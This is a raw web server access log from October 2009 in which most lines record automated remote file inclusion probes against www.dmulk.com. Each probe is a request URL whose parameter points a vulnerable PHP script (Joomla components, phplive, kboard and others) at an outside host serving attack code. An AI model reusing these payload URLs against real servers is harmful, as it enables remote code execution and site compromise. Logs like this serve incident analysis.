58.230.118.81 - - [30/Oct/2009:10:48:12 -0700] "GET /logs/access_090303.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:48:12 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:48:12 -0700] "GET /logs/access_090303.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:48:12 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:48:12 -0700] "GET /logs/access_090421.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:48:25 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:48:25 -0700] "GET /logs/access_080228.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:48:25 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15967 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:48:26 -0700] "GET /logs/access_080507.log HTTP/1.0" 200 3350468 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:48:32 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:48:46 -0700] "GET /logs/access_081008.log//skin/zero_vote/ask_password.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:36 -0700] "GET /logs/access_090115.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:36 -0700] "GET /logs/access_090115.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:36 -0700] "GET /phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:36 -0700] "GET /phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:36 -0700] "GET /logs//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:36 -0700] "GET /logs//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:37 -0700] "GET /logs/access_090204.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:37 -0700] "GET /logs/access_090204.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:37 -0700] "GET /logs/access_090115.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs/access_090115.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs/access_090115.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs/access_090115.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs/access_090204.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:38 -0700] "GET /logs//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:39 -0700] "GET /logs/access_090204.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:39 -0700] "GET /logs/access_090204.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:39 -0700] "GET /logs/access_090204.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:41 -0700] "GET /logs/access_090115.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:41 -0700] "GET /phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:41 -0700] "GET /logs//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:49:42 -0700] "GET /logs/access_090204.log//phplive/setup/header.php?css_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:49:48 -0700] "GET /bikes/GPS/ HTTP/1.0" 200 938 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.252.9 - - [30/Oct/2009:10:49:57 -0700] "GET /logs//include/write.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.252.9 - - [30/Oct/2009:10:49:57 -0700] "GET /logs/access_081007.log//include/write.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:10:49:58 -0700] "GET /logs/access_090409.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:10:49:59 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:50:09 -0700] "GET /board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:50:09 -0700] "GET /logs//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:10:50:09 -0700] "GET /logs/access_081230.log%20%20//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:10:50:26 -0700] "GET /logs/help.php?css_path=http://teamhack.pcriot.com/alat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:10:50:26 -0700] "GET /logs/access_090204.log%20%20/help.php?css_path=http://teamhack.pcriot.com/alat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:10:50:26 -0700] "GET /help.php?css_path=http://teamhack.pcriot.com/alat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:51:00 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:51:00 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:51:02 -0700] "GET /logs/access_090409.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:10:51:10 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:51:10 -0700] "GET /logs/access_081008.log//skin/zero_vote/ask_password.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:51:10 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:51:10 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:51:58 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:51:58 -0700] "GET /logs/access_090409.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:51:58 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.29.189 - - [30/Oct/2009:10:52:00 -0700] "GET /logs/access_090115.log%20%20/help.php?css_path=http://teamhack.pcriot.com/alat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.164.121 - - [30/Oct/2009:10:52:05 -0700] "GET /index.php?go=http://www.medisite.fr/id???? HTTP/1.1" 200 15904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.247.164.121 - - [30/Oct/2009:10:52:08 -0700] "GET /logs//index.php?go=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
198.64.140.84 - - [30/Oct/2009:10:52:20 -0700] "GET /logs/access_090427.log/index.php?pg=http://www.girourbano.com.br/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.64.140.84 - - [30/Oct/2009:10:52:20 -0700] "GET /logs/index.php?pg=http://www.girourbano.com.br/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.64.140.84 - - [30/Oct/2009:10:52:21 -0700] "GET /index.php?pg=http://www.girourbano.com.br/id.txt%0D?? HTTP/1.0" 200 15892 "-" "libwww-perl/5.53" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:52:30 -0700] "GET /bikes/dteel/2008_02_15/?D=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.88.229.100 - - [30/Oct/2009:10:52:32 -0700] "GET /logs/access_081202.log/////oneadmin/photogallery/include.php?path[docroot]=http://www.artofgaming.it/site/rss/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.88.229.100 - - [30/Oct/2009:10:52:32 -0700] "GET /logs/access_080330.log/////oneadmin/photogallery/include.php?path[docroot]=http://www.artofgaming.it/site/rss/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.88.229.100 - - [30/Oct/2009:10:52:32 -0700] "GET ////oneadmin/photogallery/include.php?path[docroot]=http://www.artofgaming.it/site/rss/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.88.229.100 - - [30/Oct/2009:10:52:32 -0700] "GET /logs/////oneadmin/photogallery/include.php?path[docroot]=http://www.artofgaming.it/site/rss/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:52:38 -0700] "GET /logs/access_090101.log HTTP/1.0" 200 3091278 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:52:45 -0700] "GET /logs/access_090409.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:53:07 -0700] "GET /logs/access_080808.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:53:07 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:53:12 -0700] "GET /logs/access_090409.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:10:53:23 -0700] "GET /logs/access_090721.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:10:53:36 -0700] "GET /logs/access_090721.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:10:54:05 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:10:54:05 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:10:54:08 -0700] "GET /logs/access_090409.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:54:55 -0700] "GET /logs/access_080815.log HTTP/1.0" 200 2878172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:54:56 -0700] "GET /logs/access_080221.log HTTP/1.0" 200 1367346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:55:04 -0700] "GET /logs/access_090511.log//modules/xfsection/modify.php?dir_module=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.64.140.84 - - [30/Oct/2009:10:55:59 -0700] "GET /logs/access_090106.log/index.php?pg=http://www.girourbano.com.br/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:24 -0700] "GET /become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:24 -0700] "GET /logs/become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:24 -0700] "GET /logs/access_090807.log%20%20/become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:28 -0700] "GET /logs/access.log%20%20/become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:29 -0700] "GET /become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:29 -0700] "GET /logs/become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:29 -0700] "GET /logs/access_090807.log%20%20/become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:30 -0700] "GET /bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:30 -0700] "GET /logs/access_090807.log%20%20/bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:30 -0700] "GET /logs/bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:33 -0700] "GET /bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:33 -0700] "GET /logs/access_090807.log%20%20/bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:33 -0700] "GET /logs/bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:33 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:34 -0700] "GET /logs/access.log%20%20/become_editor.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:34 -0700] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:37 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:37 -0700] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:38 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:38 -0700] "GET /logs/access_090807.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:38 -0700] "GET /logs/access_090821.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:10:56:40 -0700] "GET /logs/access_090121.log%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:44 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:44 -0700] "GET /logs/access_090807.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:56:44 -0700] "GET /logs/access_090821.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:10:57:15 -0700] "GET /logs/access_090204.log/help.php?css_path=http://teamhack.pcriot.com/alat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:10:57:15 -0700] "GET /logs/access_090115.log/help.php?css_path=http://teamhack.pcriot.com/alat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:57:20 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:57:20 -0700] "GET /logs/access_080123.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:57:21 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15974 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:57:25 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:57:31 -0700] "GET /logs/access_080123.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:57:31 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:57:32 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15974 "-" "Mozilla/5.0" "www.dmulk.com"
198.64.140.84 - - [30/Oct/2009:10:57:49 -0700] "GET /logs/access_090106.log%20/index.php?pg=http://www.girourbano.com.br/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
